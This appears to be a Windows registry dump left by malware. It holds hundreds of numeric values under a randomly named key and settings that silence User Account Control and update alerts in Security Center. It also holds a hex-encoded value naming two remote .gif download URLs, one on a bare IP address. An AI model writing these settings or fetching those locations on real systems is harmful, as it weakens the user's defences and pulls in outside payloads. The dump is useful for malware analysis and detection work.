"m1_365" = "3507934164"
"m1_641" = "3370962851"
"m1_640" = "3465281193"
"m1_643" = "2045902750"
"m1_642" = "3397944097"
"m1_645" = "1424123339"
"m1_644" = "2745704733"
"m3_364" = "268764373"
"m3_365" = "2037888064"
"m3_366" = "3739232255"
"m3_367" = "1179834218"
"m3_360" = "1917836129"
"m3_361" = "3686288028"
"m3_362" = "1126889995"
"m3_363" = "2828309926"
"m1_388" = "1099563529"
"m1_389" = "4066063279"
"m3_368" = "2948810393"
"m3_369" = "388888116"
"m4_424" = "1323863176"
"m4_425" = "3059153909"
"m4_426" = "499477346"
"m4_427" = "2234768079"
"m4_420" = "2972634836"
"m4_421" = "412958273"
"m4_422" = "2148249006"
"m4_423" = "3883539739"
"m3_562" = "292812643"
"m4_323" = "2153158279"
"m3_560" = "1083233369"
"m3_561" = "2818656244"
"m4_428" = "3970058812"
"m4_429" = "1410382249"
"m3_564" = "3729659405"
"m3_565" = "1203274168"
"m1_55" = "3935690198"
"m1_54" = "2676628899"
"m1_57" = "313905025"
"m1_56" = "3099755236"
"m1_51" = "2495051713"
"m1_50" = "3166191927"
"m1_53" = "1170818336"
"m1_52" = "2674574330"
"m1_59" = "2574047048"
"m1_58" = "155894208"
"m3_108" = "2744413141"
"m3_109" = "184949568"
"m3_104" = "98446945"
"m3_105" = "1833490844"
"m3_106" = "3535358219"
"m3_107" = "975960230"
"m3_100" = "1713433789"
"m3_101" = "3482491944"
"m3_102" = "922947399"
"m3_103" = "2624438002"
"m3_580" = "1463228637"
"m3_581" = "3164702792"
"m3_582" = "605174759"
"m3_583" = "2373757714"
"m3_584" = "4075641473"
"m3_585" = "1516227132"
"m3_586" = "3284690347"
"m3_587" = "725226694"
"m3_588" = "2426700917"
"m3_589" = "4162140128"
"m3_610" = "1948707731"
"m3_611" = "3717241614"
"m3_612" = "1157696189"
"m3_613" = "2859711016"
"m4_558" = "1924587414"
"m4_559" = "3659878147"
"m3_616" = "3770643553"
"m3_617" = "1210705820"
"m4_554" = "3573359074"
"m4_555" = "1013682511"
"m4_556" = "2748973244"
"m4_557" = "189296681"
"m4_550" = "927163438"
"m4_551" = "2662454171"
"m4_552" = "102777608"
"m4_553" = "1838068341"
"m2_279" = "3109781327"
"m2_278" = "1374491578"
"m2_277" = "3934161554"
"m2_276" = "2198878888"
"m2_275" = "463578928"
"m2_274" = "3023261778"
"m2_273" = "1287965454"
"m2_272" = "3847647300"
"m2_271" = "2112348553"
"m2_270" = "377068029"
"m3_421" = "429806696"
"m1_564" = "710644573"
"m1_565" = "3545351395"
"m1_566" = "3040588863"
"m1_567" = "2274087386"
"m1_560" = "1913290773"
"m1_561" = "1121966040"
"m1_562" = "253918830"
"m1_563" = "3246653874"
"m1_568" = "3686142307"
"m1_569" = "737289369"
"m3_238" = "698940799"
"m2_118" = "2900836996"
"m3_239" = "2434362602"
"m2_112" = "1079026937"
"m2_113" = "2814327881"
"m2_110" = "1903425009"
"m2_111" = "3638707759"
"m2_116" = "3725225172"
"m2_117" = "1165557190"
"m2_114" = "254641412"
"m2_115" = "1989942153"
"m3_234" = "2347938699"
"m3_614" = "333206855"
"m3_235" = "4083360550"
"m3_615" = "2068759794"
"m3_618" = "2979763979"
"m3_619" = "419694246"
"m2_488" = "713325995"
"m2_489" = "2448605561"
"m1_179" = "3529145340"
"m1_178" = "696058340"
"m1_173" = "2714206487"
"m1_172" = "445726376"
"m1_171" = "1144272753"
"m1_170" = "88725579"
"m1_177" = "186457854"
"m1_176" = "2974283584"
"m1_175" = "1755581866"
"m1_174" = "789665096"
"m2_644" = "835738163"
"m2_645" = "2571021845"
"m2_642" = "1660122199"
"m2_643" = "3395405346"
"m2_640" = "2484503348"
"m2_641" = "4219791633"
"m1_9" = "832982715"
"m4_218" = "336257746"
"m1_379" = "354617132"
"m1_378" = "2402579785"
"m1_375" = "394139158"
"m1_8" = "1352418389"
"m1_377" = "135934779"
"m1_376" = "2962213199"
"m1_371" = "3248475716"
"m1_370" = "1294028848"
"m1_373" = "3531100441"
"m1_372" = "4010011809"
"m4_566" = "2922011390"
"m3_377" = "1352760748"
"m3_376" = "3945841201"
"m3_375" = "2210812546"
"m3_374" = "441819927"
"m3_373" = "3001758712"
"m3_372" = "1299873869"
"m3_371" = "3825733854"
"m3_370" = "2090754467"
"m1_399" = "3428221841"
"m1_398" = "3643926719"
"m3_379" = "561880182"
"m3_378" = "3088313563"
"m4_437" = "2407806225"
"m4_436" = "672515492"
"m4_435" = "3232192055"
"m4_434" = "1496901322"
"m4_433" = "4056577885"
"m4_432" = "2321287152"
"m4_431" = "585996419"
"m4_430" = "3145672982"
"m3_575" = "1343172602"
"m3_574" = "3902717007"
"m3_577" = "518672004"
"m3_576" = "3111772009"
"m3_571" = "2991710774"
"m3_570" = "1256682139"
"m4_439" = "1583420395"
"m4_438" = "4143096958"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 6B 24 65 D1 CD CB 03 3B 65 E4 A1 CC 33 5D E7"

[HKCU\Software\Stvncyfrlda]
"m1_43" = "1636765073"
"m1_40" = "1800662581"
"m1_41" = "3581849624"
"m1_46" = "2416262492"
"m1_47" = "3665907900"
"m1_44" = "3046463879"
"m1_45" = "2287517440"
"m1_48" = "647774394"
"m1_49" = "1250197525"
"m3_119" = "357998978"
"m3_118" = "2917414423"
"m3_117" = "1148946168"
"m3_116" = "3741914957"
"m3_115" = "2006935518"
"m3_114" = "237958307"
"m3_113" = "2797356340"
"m3_112" = "1096013209"
"m3_111" = "3655416426"
"m3_110" = "1886423807"
"m3_593" = "2547216724"
"m3_592" = "778225209"
"m3_591" = "3337639562"
"m3_590" = "1636280095"
"m3_597" = "898282264"
"m3_596" = "3424125933"
"m3_595" = "1689227390"
"m3_594" = "4282245315"
"m2_95" = "1643859347"
"m3_598" = "2600149687"
"m3_603" = "2686656406"
"m3_602" = "951151739"
"m3_601" = "3544251596"
"m3_600" = "1809206609"
"m3_607" = "1071208794"
"m3_606" = "3597184559"
"m4_549" = "3486840001"
"m4_548" = "1751549268"
"m4_547" = "16258535"
"m4_546" = "2575935098"
"m4_545" = "840644365"
"m4_544" = "3400320928"
"m4_543" = "1665030195"
"m4_542" = "4224706758"
"m4_541" = "2489416025"
"m4_540" = "754125292"

"m1_576" = "2804084271"
"m1_575" = "1914452412"
"m1_574" = "3780115158"
"m1_573" = "4242285277"
"m1_572" = "4057107519"
"m1_571" = "1118878145"
"m1_570" = "3215527363"
"m1_579" = "2142988111"
"m1_578" = "1161026925"
"m2_242" = "3328528372"
"m2_243" = "768859562"
"m2_89" = "4117012523"
"m2_241" = "1593244455"
"m2_246" = "1679755267"
"m2_247" = "3415055505"
"m2_244" = "2504135352"
"m2_245" = "4239438345"
"m2_83" = "2295216153"
"m2_82" = "559919028"
"m2_248" = "855371036"
"m2_249" = "2590668673"
"m2_87" = "646431848"
"m2_86" = "3206115521"
"m2_85" = "1470816764"
"m2_84" = "4030502268"
"m2_109" = "168124549"
"m2_108" = "2727810512"
"m2_105" = "1816895758"
"m2_104" = "81615226"
"m2_107" = "992510783"
"m2_106" = "3552197098"
"m2_101" = "3465668244"
"m2_100" = "1730387040"
"m2_103" = "2641282191"
"m2_102" = "906002189"
"m3_423" = "3866720050"
"m3_422" = "2164836231"
"m3_393" = "3381290108"
"m3_420" = "2955781373"
"m3_427" = "2217783526"
"m3_426" = "482738507"
"m3_425" = "3075838428"
"m3_424" = "1340860065"
"m2_8" = "997417692"
"m2_9" = "2732718958"
"m2_2" = "3470574940"
"m2_3" = "910907643"
"m2_0" = "1473"
"m2_1" = "1735291469"
"m2_6" = "1821803618"
"m2_7" = "3557101875"
"m2_4" = "2646188728"
"m2_5" = "86522069"
"m2_499" = "2621645891"
"m2_498" = "886363260"
"m1_148" = "2939780045"
"m1_149" = "139302232"
"m1_146" = "2264359775"
"m1_147" = "856660205"
"m1_144" = "916503661"
"m1_145" = "1506304235"
"m1_142" = "3516981039"
"m1_143" = "175604278"
"m1_140" = "239497170"
"m1_141" = "3180159092"
"m1_158" = "37238671"
"m2_119" = "341170931"
"m4_220" = "3806839212"
"m3_348" = "2602308101"
"m4_221" = "1247162649"

[HKCU\Software\Stvncyfrlda\168128873]
"910904903" = "0"

[HKCU\Software\Stvncyfrlda]
"m3_342" = "747352503"
"m3_343" = "2515804450"
"m3_340" = "1604884205"
"m3_341" = "3340305944"
"m3_346" = "3393319803"
"m3_347" = "867328662"
"m3_344" = "4251373649"
"m3_345" = "1658274764"
"m4_158" = "3592996166"
"m4_159" = "1033319603"
"m4_408" = "3623982520"
"m4_409" = "1064305957"
"m4_150" = "2595572190"
"m4_151" = "35895627"
"m4_152" = "1771186360"
"m4_153" = "3506477093"
"m4_154" = "946800530"
"m4_155" = "2682091263"
"m4_156" = "122414700"
"m4_157" = "1857705433"
"m3_298" = "1737416395"
"m3_299" = "3439283814"
"m3_294" = "3385892103"
"m3_295" = "826346674"
"m3_296" = "2528361505"
"m3_297" = "4263259996"
"m3_290" = "706302803"
"m4_228" = "509295892"
"m3_292" = "4176769661"
"m3_293" = "1617358312"
"m4_229" = "2244586625"
"m4_398" = "3450944374"
"m4_399" = "891267811"
"m4_392" = "1629134568"
"m4_393" = "3364425301"
"m4_390" = "2453520398"
"m4_391" = "4188811131"
"m4_396" = "4275330204"
"m4_397" = "1715653641"
"m4_394" = "804748738"
"m4_395" = "2540039471"
"m3_122" = "1268937691"
"m3_123" = "3003966326"
"m3_120" = "2059882801"
"m3_121" = "3794911404"
"m3_126" = "3914972559"
"m3_127" = "1321872698"
"m3_124" = "410948325"
"m3_125" = "2179924496"
"m3_128" = "3056917673"
"m3_129" = "530927556"
"m1_99" = "812878970"
"m1_98" = "1914991464"
"m1_91" = "2580841924"
"m1_90" = "290848589"
"m1_93" = "636337100"
"m1_92" = "4168627776"
"m1_95" = "1053875242"
"m1_94" = "3640753757"
"m1_97" = "108094070"
"m1_96" = "1380985173"
"m4_613" = "2876297217"
"m4_612" = "1141006484"
"m4_611" = "3700683047"
"m4_572" = "448853900"
"m4_573" = "2184144633"
"m4_570" = "1273239730"
"m4_571" = "3008530463"
"m4_576" = "3095049536"
"m4_577" = "535372973"
"m4_574" = "3919435366"
"m4_575" = "1359758803"
"m4_617" = "1227525557"
"m4_578" = "2270663706"
"m4_579" = "4005954439"
"m4_616" = "3787202120"
"m4_370" = "2107444106"
"m4_371" = "3842734839"
"m4_372" = "1283058276"
"m4_373" = "3018349009"
"m4_374" = "458672446"
"m4_375" = "2193963179"
"m4_376" = "3929253912"
"m4_377" = "1369577349"
"m4_378" = "3104868082"
"m4_379" = "545191519"
"m4_614" = "316620654"
"m3_638" = "3292191631"
"m3_639" = "766200634"
"m3_93" = "2451378352"
"m3_92" = "716398853"
"m3_91" = "3309498774"
"m3_90" = "1573930619"
"m3_97" = "836457060"
"m3_96" = "3362431689"
"m3_95" = "1626878810"
"m3_94" = "4220485679"
"m3_99" = "4273372430"
"m3_98" = "2571488659"
"m1_548" = "939456537"
"m1_549" = "26179220"
"m1_542" = "2287745909"
"m1_543" = "3825126746"
"m1_540" = "110937577"
"m1_541" = "911201880"
"m1_546" = "3273943748"
"m1_547" = "2774072669"
"m1_544" = "17493787"
"m1_545" = "2775816460"
"m2_98" = "2554770932"
"m2_99" = "4290052608"
"m2_257" = "3588080817"
"m2_256" = "1852786890"
"m2_251" = "1766271947"
"m2_250" = "30984190"
"m2_253" = "941886733"
"m2_252" = "3501571376"
"m2_90" = "1557345541"
"m2_91" = "3292642237"
"m2_92" = "732962524"
"m2_93" = "2468244945"
"m2_94" = "4203532236"
"m2_258" = "1028412723"
"m2_96" = "3379158833"
"m2_97" = "819470932"
"m1_498" = "3704560951"
"m1_499" = "4149926322"
"m1_494" = "3828538342"
"m1_495" = "51912971"
"m1_496" = "109688970"
"m1_497" = "3321271276"
"m1_490" = "666591371"
"m1_491" = "3086512734"
"m1_492" = "1639830720"
"m1_493" = "571998036"
"m3_265" = "273825276"
"m3_264" = "2833351233"

[HKCU\Software\Stvncyfrlda\168128873]
"-1648771660" = "30"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Stvncyfrlda]
"m2_628" = "3135849336"
"m2_629" = "576178231"
"m2_624" = "489655802"
"m2_625" = "2224954553"
"m2_626" = "3960237034"
"m2_627" = "1400566781"
"m2_620" = "2138423460"
"m2_621" = "3873722590"
"m2_622" = "1314041714"
"m2_623" = "3049339383"
"m2_325" = "1328770236"
"m2_324" = "3888451744"
"m4_416" = "326439200"
"m2_327" = "504381960"
"m1_151" = "1325341917"
"m1_150" = "3187434083"
"m1_153" = "1663284376"
"m1_152" = "1268272663"
"m1_155" = "142821956"
"m1_154" = "3398792655"
"m1_157" = "567493224"
"m1_156" = "4186830039"
"m1_159" = "288317709"
"m2_321" = "2977538713"
"m2_320" = "1242259327"
"m2_326" = "3064068564"
"m2_323" = "2153154493"
"m2_322" = "417869930"
"m2_530" = "581087733"
"m2_531" = "2316371255"
"m2_532" = "4051665872"
"m2_533" = "1491986677"
"m2_534" = "3227284956"
"m2_535" = "667599383"
"m2_536" = "2402901246"
"m2_537" = "4138184322"
"m2_538" = "1578512630"
"m2_539" = "3313799000"
"m2_329" = "3974967073"
"m2_328" = "2239683830"
"m4_415" = "2886115763"
"m4_414" = "1150825030"
"m4_417" = "2061729933"
"m4_413" = "3710501593"
"m4_411" = "239920127"
"m4_410" = "2799596690"
"m3_359" = "182266866"
"m3_358" = "2775365703"
"m3_355" = "1864887822"
"m3_354" = "129334931"
"m3_357" = "1006766376"
"m3_356" = "3566311869"
"m3_351" = "3513363546"
"m3_350" = "1778335023"
"m3_353" = "2655309668"
"m3_352" = "920281033"
"m4_412" = "1975210860"
"m4_149" = "860281457"
"m4_148" = "3419958020"
"m4_419" = "1237344103"
"m4_418" = "3797020666"
"m4_143" = "3333438947"
"m4_142" = "1598148214"
"m4_141" = "4157824777"
"m4_140" = "2422534044"
"m4_147" = "1684667287"
"m4_146" = "4244343850"
"m4_145" = "2509053117"
"m4_144" = "773762384"
"m3_289" = "3265830948"
"m3_288" = "1564356745"
"m3_287" = "4123885850"
"m3_286" = "2355302895"
"m3_285" = "619800176"
"m3_284" = "3212900037"
"m3_283" = "1444300630"
"m3_282" = "4003845179"
"m3_281" = "2302354572"
"m3_280" = "566932753"
"m4_389" = "718229665"
"m4_388" = "3277906228"
"m4_385" = "2367001325"
"m4_384" = "631710592"
"m4_387" = "1542615495"
"m4_386" = "4102292058"
"m4_381" = "4015772985"
"m4_380" = "2280482252"
"m4_383" = "3191387155"
"m4_382" = "1456096422"
"m3_135" = "2319427666"
"m3_134" = "583874855"
"m3_137" = "1528482684"
"m3_136" = "4087897025"
"m4_89" = "4117019877"
"m3_130" = "2266496883"
"m3_133" = "3176958344"
"m3_132" = "1441930781"
"m4_85" = "1470824241"
"m4_84" = "4030500804"
"m4_87" = "646438411"
"m4_86" = "3206114974"
"m4_81" = "3119595901"
"m4_80" = "1384305168"
"m4_83" = "2295210071"
"m4_82" = "559919338"
"m3_406" = "136830199"
"m1_86" = "4045988655"
"m1_87" = "4229359945"
"m1_84" = "3386952941"
"m1_85" = "253297037"
"m1_82" = "3603247670"
"m1_83" = "381831176"
"m1_80" = "2313298852"
"m1_81" = "1395451115"
"m1_88" = "2069503785"
"m1_89" = "3618336951"
"m2_394" = "804743073"
"m2_395" = "2540043271"
"m2_396" = "4275337558"
"m2_397" = "1715658541"
"m2_390" = "2453527149"
"m2_391" = "4188813916"
"m2_392" = "1629130125"
"m2_393" = "3364428641"
"m2_398" = "3450939582"
"m2_399" = "891273054"
"m4_363" = "2845310863"
"m4_362" = "1110020130"
"m4_361" = "3669696693"
"m4_360" = "1934405960"
"m4_367" = "1196539203"
"m4_366" = "3756215766"
"m4_365" = "2020925033"
"m4_364" = "285634300"
"m3_621" = "3890684224"
"m3_620" = "2121707989"
"m4_369" = "372153373"
"m4_368" = "2931829936"
"m3_625" = "2241684276"
"m3_624" = "472707993"
"m3_627" = "1383697886"
"m3_626" = "3977188003"
"m4_535" = "667606219"
"m3_80" = "1401010233"
"m3_81" = "3102878548"
"m3_82" = "542956227"
"m3_83" = "2311932542"
"m3_84" = "4047496685"
"m3_85" = "1453954328"
"m3_86" = "3189376183"
"m3_87" = "663008290"
"m3_88" = "2364876625"
"m3_89" = "4100445900"
"m4_532" = "4051668612"
"m1_559" = "3978953328"
"m1_558" = "4072223264"
"m1_555" = "4200732729"
"m1_554" = "3789096793"
"m1_557" = "3295762267"
"m1_556" = "2299586968"
"m1_551" = "2784800551"
"m1_550" = "555694484"
"m1_553" = "1454853723"
"m1_552" = "2194839474"
"m4_533" = "1491992049"
"m1_489" = "3570516276"
"m1_488" = "1403113297"
"m1_487" = "3346432269"
"m1_486" = "2074538868"
"m1_485" = "3267081088"
"m1_484" = "3016621788"
"m1_483" = "642060510"
"m1_482" = "1743370092"
"m1_481" = "3739900742"
"m1_480" = "2458092105"
"m2_49" = "3424864112"
"m2_48" = "1689582282"
"m2_47" = "4249250745"
"m2_46" = "2513966934"
"m2_45" = "778679267"
"m2_44" = "3338373516"
"m2_43" = "1603052302"
"m2_42" = "4162736735"
"m2_41" = "2427437681"
"m2_40" = "692157962"
"m2_480" = "4010867280"
"m2_481" = "1451181533"
"m4_531" = "2316377879"
"m2_482" = "3186480022"
"m2_483" = "626791337"
"m2_484" = "2362097424"
"m2_485" = "4097377185"
"m2_486" = "1537708438"
"m3_131" = "3967839982"
"m2_487" = "3272991084"
"m4_88" = "2381729144"
"m3_446" = "862287311"
"m3_139" = "703982086"
"m3_138" = "3230366443"
"m3_526" = "2246810591"
"m2_639" = "749220023"
"m3_527" = "3981708106"
"m2_637" = "1573607514"
"m2_636" = "4133274171"
"m2_635" = "2397993297"
"m2_634" = "662692472"
"m2_633" = "3222379835"
"m3_524" = "3071244597"
"m2_631" = "4046763743"
"m2_630" = "2311465312"
"m3_525" = "477751456"
"m3_522" = "3861667435"
"m3_523" = "1335806342"
"m1_124" = "203106326"
"m1_125" = "3004234304"
"m1_126" = "2311457947"
"m1_127" = "3785676248"
"m1_120" = "594001362"
"m1_121" = "3197185103"
"m1_122" = "1666921387"
"m1_123" = "1756605446"
"m3_521" = "2126753532"
"m1_128" = "3402904906"
"m1_129" = "185828756"
"m1_238" = "1696225512"
"m1_239" = "3744932980"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKCU\Software\Stvncyfrlda]
"m1_230" = "3450366165"
"m1_231" = "612815395"
"m1_232" = "164671606"
"m1_233" = "1075688701"
"m1_234" = "3195094288"
"m1_235" = "263160699"
"m1_236" = "4169523029"
"m1_237" = "1639314678"
"m2_523" = "1318957679"
"m2_522" = "3878627783"
"m2_521" = "2143345547"
"m2_520" = "408046236"
"m2_527" = "3965156147"
"m2_526" = "2229855860"
"m2_525" = "494574420"
"m2_524" = "3054252571"
"m2_529" = "3140771001"
"m2_528" = "1405469334"
"m4_620" = "2138430460"
"m1_374" = "295867397"
"m4_178" = "3939072458"
"m4_179" = "1379395895"
"m4_176" = "468490992"
"m4_177" = "2203781725"
"m4_174" = "1292876822"
"m4_175" = "3028167555"
"m4_172" = "2117262652"
"m4_173" = "3852553385"
"m4_170" = "2941648482"
"m4_171" = "381971919"
"m1_309" = "4119211866"
"m3_579" = "4022692270"
"m1_612" = "646929551"
"m4_98" = "2554767290"
"m4_99" = "4290058023"
"m3_440" = "3301763441"
"m1_613" = "2942020722"
"m4_92" = "732957484"
"m4_93" = "2468248217"
"m4_90" = "1557343314"
"m4_91" = "3292634047"
"m4_96" = "3379153120"
"m4_97" = "819476557"
"m4_94" = "4203538950"
"m4_95" = "1643862387"
"m3_386" = "4119292019"
"m3_387" = "1525750766"
"m3_384" = "614746537"
"m3_385" = "2350315716"
"m3_382" = "1472802447"
"m3_383" = "3208371770"
"m3_380" = "2263748581"
"m3_381" = "3998793488"
"m3_430" = "3128705855"
"m3_431" = "602862250"
"m3_432" = "2338287065"
"m3_433" = "4039712116"
"m3_434" = "1480297699"
"m3_435" = "3248765982"
"m3_388" = "3261303581"
"m3_389" = "734804616"
"m4_565" = "1186720657"
"m1_614" = "4141347866"
"m4_621" = "3873721193"
"m4_564" = "3746397220"
"m1_615" = "776473962"
"m4_567" = "362334827"
"m4_284" = "3196296428"
"m4_285" = "636619865"
"m4_286" = "2371910598"
"m4_287" = "4107201331"
"m4_280" = "550100792"
"m4_281" = "2285391525"
"m4_282" = "4020682258"
"m4_283" = "1461005695"
"m4_561" = "2835492317"
"m4_288" = "1547524768"
"m4_289" = "3282815501"
"m4_560" = "1100201584"
"m2_387" = "1542613160"
"m2_386" = "4102297469"
"m2_385" = "2366997857"
"m2_384" = "631716580"
"m2_383" = "3191385514"
"m2_382" = "1456102796"
"m2_381" = "4015770229"
"m2_380" = "2280472582"
"m4_590" = "1619316022"
"m4_591" = "3354606755"
"m4_592" = "794930192"
"m4_562" = "275815754"
"m4_594" = "4265511658"
"m4_595" = "1705835095"
"m2_389" = "718226822"
"m2_388" = "3277911874"
"m4_356" = "3583177620"
"m4_357" = "1023501057"
"m4_354" = "112596154"
"m4_355" = "1847886887"
"m4_352" = "936981984"
"m4_353" = "2672272717"
"m4_350" = "1761367814"
"m4_351" = "3496658547"
"m4_600" = "1792354168"
"m4_601" = "3527644901"
"m4_602" = "967968338"
"m4_603" = "2703259071"
"m4_604" = "143582508"
"m4_605" = "1878873241"
"m4_358" = "2758791790"
"m4_359" = "199115227"
"m4_569" = "3832916293"
"m4_568" = "2097625560"
"m3_629" = "592751864"
"m3_628" = "3152690509"
"m4_500" = "61972708"
"m3_144" = "790480761"
"m4_644" = "835735092"
"m3_145" = "2492364436"
"m4_507" = "3619073247"
"m3_148" = "3403350317"
"m2_58" = "1862608999"
"m2_59" = "3597909484"
"m3_149" = "843427928"
"m2_54" = "3511390630"
"m2_55" = "951707625"
"m2_56" = "2686993502"
"m2_57" = "127325069"
"m2_50" = "865162955"
"m2_51" = "2600480044"
"m2_52" = "40811196"
"m2_53" = "1776103827"
"m3_622" = "1330761983"
"m1_586" = "3662868790"
"m1_587" = "3166381696"
"m1_584" = "790125077"
"m1_585" = "1174731642"
"m1_582" = "3679404223"
"m1_583" = "3515541065"
"m1_580" = "2013952389"
"m1_581" = "4086399855"
"m1_588" = "3537716317"
"m1_589" = "385062066"
"m2_602" = "967971413"
"m2_603" = "2703249525"
"m2_600" = "1792357061"
"m2_601" = "3527642364"
"m2_606" = "3614170355"
"m2_607" = "1054482519"
"m2_604" = "143587565"
"m2_605" = "1878882045"
"m2_608" = "2789770172"
"m2_609" = "230098121"
"m4_508" = "1059396684"
"m1_137" = "2925469520"
"m1_136" = "529075234"
"m1_135" = "3136794341"
"m1_134" = "3454824132"
"m1_133" = "4117805262"
"m1_132" = "853112896"
"m1_131" = "2292910259"
"m1_130" = "287651104"
"m1_139" = "3389941883"
"m1_138" = "766127368"
"m1_229" = "388674838"
"m1_228" = "731996270"
"m1_223" = "1342173340"
"m1_222" = "1167649119"
"m1_221" = "1224768423"
"m1_220" = "1114899676"
"m1_227" = "684175828"
"m1_226" = "1295469387"
"m1_225" = "534586739"
"m1_224" = "4113760813"
"m2_516" = "2056817927"
"m2_517" = "3792115181"
"m2_514" = "2881203317"
"m1_417" = "3788704251"
"m2_512" = "3705588812"
"m2_513" = "1145921109"
"m2_510" = "235006929"
"m2_511" = "1970303216"
"m2_518" = "1232433130"
"m2_519" = "2967728625"
"m1_393" = "3693781588"
"m1_318" = "1426497244"
"m1_392" = "3483203931"
"m1_391" = "3438831557"
"m1_390" = "2538772522"
"m1_397" = "1421805945"
"m1_396" = "2720319456"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"

[HKCU\Software\Stvncyfrlda]
"m1_395" = "1433839762"
"m2_614" = "316615986"
"m1_394" = "3383088820"
"m4_512" = "3705592320"
"m4_513" = "1145915757"
"m4_161" = "208933773"
"m4_160" = "2768610336"
"m4_163" = "3679515239"
"m4_162" = "1944224506"
"m4_165" = "2855129409"
"m4_164" = "1119838676"
"m4_167" = "2030743579"
"m4_166" = "295452846"
"m4_169" = "1206357749"
"m4_168" = "3766034312"
"m3_578" = "2253717043"
"m4_67" = "300362119"
"m4_66" = "2860038682"
"m4_65" = "1124747949"
"m4_64" = "3684424512"
"m4_63" = "1949133779"
"m4_62" = "213843046"
"m4_61" = "2773519609"
"m4_60" = "1038228876"
"m4_69" = "3770943585"
"m4_68" = "2035652852"
"m3_399" = "874299594"
"m3_398" = "3434238303"
"m3_429" = "1427362688"
"m3_428" = "3986759701"
"m3_391" = "4172236114"
"m3_390" = "2470357543"
"m1_313" = "3707292982"
"m3_392" = "1612313793"
"m3_395" = "2523301638"
"m3_394" = "787748843"
"m3_397" = "1732355616"
"m3_396" = "4292294325"
"m4_297" = "4280239477"
"m4_296" = "2544948744"
"m4_295" = "809658011"
"m4_294" = "3369334574"
"m4_293" = "1634043841"
"m4_292" = "4193720404"
"m4_291" = "2458429671"
"m4_290" = "723138938"
"m2_491" = "1624220039"
"m1_624" = "1420319941"
"m3_572" = "465804709"
"m4_299" = "3455853647"
"m4_298" = "1720562914"
"m4_589" = "4178992585"
"m4_588" = "2443701852"
"m4_583" = "2357182779"
"m4_582" = "621892046"
"m4_581" = "3181568609"
"m4_580" = "1446277876"
"m4_587" = "708411119"
"m4_586" = "3268087682"
"m4_585" = "1532796949"
"m4_584" = "4092473512"
"m4_349" = "26077081"
"m4_348" = "2585753644"
"m4_619" = "403139727"
"m4_618" = "2962816290"
"m4_341" = "3323620401"
"m4_340" = "1588329668"
"m4_343" = "2499234571"
"m4_342" = "763943838"
"m4_345" = "1674848741"
"m4_344" = "4234525304"
"m4_347" = "850462911"
"m4_346" = "3410139474"

[HKCU\Software\Stvncyfrlda\168128873]
"-737866757" = "4B278A835FE92988F90F7C3CA41943E954C2A3E5F485BE927C19BB1BE3A4606DACD30115F9A5DFCC9A54A9CBC970B3F5552946D7DCA330D47DB444FE33A74E4F3934F853C78E0DC6D9EEE227165CFE1E5F4DF951B4E949E9FD58BC2F492F3A5FE47491DA52289271F36B555070B2FE3D61BD99AA79CD32B302250EFC3B19E5BA5983117001ACB3CC3315F4E8A6E14E431831F637A045E8B2E9D85E4FE4BB17441E184C36D2CE87AFD142CC126B0B44025A35802EFB7597B96B29F209B5C200ABEF3AD8D9E89ED2BD716737EA3531C319A48A0859A5D987B1F40AD720852CD4BAEEFF0335C753F5B39E9B397C689313439635D8144E674989A2B7C1E13F1E2F2E"

[HKCU\Software\Stvncyfrlda]
"m2_288" = "1547520324"
"m2_289" = "3282817977"
"m2_286" = "2371907006"
"m2_287" = "4107205643"
"m2_284" = "3196293037"
"m2_285" = "636621842"
"m2_282" = "4020674478"
"m2_283" = "1461007522"
"m2_280" = "550108768"
"m2_281" = "2285394493"
"m2_350" = "1761362540"
"m2_351" = "3496661792"
"m2_352" = "936980312"
"m2_353" = "2672279041"
"m2_354" = "112593996"
"m2_355" = "1847891654"
"m2_356" = "3583174365"
"m2_357" = "1023506497"
"m2_358" = "2758789486"
"m2_359" = "199121296"
"m2_69" = "3770951987"
"m2_68" = "2035648009"
"m3_645" = "2554189704"
"m2_61" = "2773503985"
"m2_60" = "1038237070"
"m2_63" = "1949136233"
"m2_62" = "213839611"
"m2_65" = "1124750533"
"m2_64" = "3684418167"
"m2_67" = "300366342"
"m2_66" = "2860032896"
"m3_644" = "819143709"
"m1_599" = "2740540207"
"m1_598" = "1823302124"
"m1_591" = "1372441050"
"m1_590" = "3879425375"
"m1_593" = "773482784"
"m1_592" = "216755556"
"m1_595" = "4077375202"
"m1_594" = "3669941686"
"m1_597" = "3491969292"
"m1_596" = "478776739"
"m1_37" = "3018188319"
"m1_36" = "3422610727"
"m1_35" = "3083015352"
"m1_34" = "739160523"
"m1_33" = "2702514902"
"m1_32" = "1180980499"
"m2_462" = "2840398294"
"m1_31" = "4269582479"
"m2_463" = "280730191"
"m1_30" = "3808679026"
"m2_460" = "3664781610"
"m2_461" = "1105113407"
"m2_466" = "1191626638"
"m2_467" = "2926925667"
"m2_464" = "2016011316"
"m4_536" = "2402896952"
"m3_640" = "2501245609"
"m2_465" = "3751309649"
"m4_518" = "1232434830"
"m2_615" = "2051912069"
"m1_42" = "1789610529"
"m2_617" = "1227529571"
"m2_616" = "3787197007"
"m2_611" = "3700681323"
"m2_610" = "1965396988"
"m2_613" = "2876296142"
"m2_612" = "1141011759"
"m2_619" = "403141655"
"m2_618" = "2962808838"

[HKCU\Software\Stvncyfrlda\168128873]
"1821809806" = "0200687474703A2F2F736C776F6366642F736F62616B61312E67696600687474703A2F2F34362E3130352E3130332E3231392F736F62616B61766F6C6F732E676966"

[HKCU\Software\Stvncyfrlda]
"m4_519" = "2967725563"
"m4_640" = "2484506752"
"m4_641" = "4219797485"
"m4_642" = "1660120922"
"m4_643" = "3395411655"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Stvncyfrlda]
"m1_108" = "2805205673"
"m1_109" = "209572100"
"m1_102" = "1815568211"
"m1_103" = "2138095271"
"m1_100" = "3568094242"
"m1_101" = "3977301451"
"m1_106" = "1566012015"
"m1_107" = "2458633683"
"m1_104" = "2160341791"
"m1_105" = "3589831327"
"m1_218" = "3181364844"
"m1_219" = "3675371188"
"m1_216" = "2002974020"
"m1_217" = "2522771582"
"m1_214" = "769808456"
"m1_215" = "1567563218"
"m1_212" = "3868294399"
"m1_213" = "486374671"
